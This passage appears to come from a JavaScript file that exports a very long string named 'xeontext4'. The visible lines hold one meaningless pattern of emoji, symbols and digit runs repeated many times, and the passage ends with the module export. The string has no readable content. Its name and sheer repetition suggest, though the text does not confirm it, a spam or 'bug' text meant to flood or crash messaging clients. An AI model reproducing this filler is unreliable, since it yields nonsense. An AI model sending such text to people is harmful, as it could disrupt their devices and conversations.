🎋.*~5~*.-*~@1111111~*.🩸.* 762 | ♿.*~6~*.-*~@5555555~*.⚙.* 763 | 🎁.*~1~*.-*~@7777777~*.🎉.* 764 | 🔮.*~3~*.-*~@666666~*.🎩.* 765 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 766 | 💐.*~7~*.-*~@22222222~*.🦧.* 767 | 🥥.*~0~*.-*~@444444~*.🏖.* 768 | 🎋.*~5~*.-*~@1111111~*.🩸.* 769 | ♿.*~6~*.-*~@5555555~*.⚙.* 770 | 🎁.*~1~*.-*~@7777777~*.🎉.* 771 | 🔮.*~3~*.-*~@666666~*.🎩.* 772 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 773 | 💐.*~7~*.-*~@22222222~*.🦧.* 774 | 🥥.*~0~*.-*~@444444~*.🏖.* 775 | 🎋.*~5~*.-*~@1111111~*.🩸.* 776 | ♿.*~6~*.-*~@5555555~*.⚙.* 777 | 🎁.*~1~*.-*~@7777777~*.🎉.* 778 | 🔮.*~3~*.-*~@666666~*.🎩.* 779 | 🚻.*~8~*.-*~@888888~*.💊.*` 780 | exports.xeontext4 = xeontext4 --------------------------------------------------------------------------------